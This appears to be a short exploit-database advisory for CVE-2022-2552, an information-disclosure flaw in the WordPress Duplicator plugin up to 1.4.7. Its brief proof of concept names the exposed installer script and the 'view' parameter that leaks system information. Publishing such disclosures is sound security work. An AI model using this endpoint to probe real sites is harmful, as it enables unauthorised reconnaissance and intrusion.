# Exploit Title: WordPress Plugin Duplicator 1.4.7 - Information Disclosure# Google Dork: N/A# Date: 07.27.2022# Exploit Author: SecuriTrust# Vendor Homepage: https://snapcreek.com/# Software Link: https://wordpress.org/plugins/duplicator/# Version: <= 1.4.7# Tested on: Linux, Windows# CVE : CVE-2022-2552# Reference: https://securitrust.fr# Reference: https://github.com/SecuriTrust/CVEsLab/CVE-2022-2552#Product:
WordPress Plugin Duplicator <=1.4.7#Vulnerability:1-Some system information may be disclosure.#Proof-Of-Concept:1-System information.
Some system information is obtained using the "view" parameter.
http://[PATH]/backups-dup-lite/dup-installer/main.installer.php
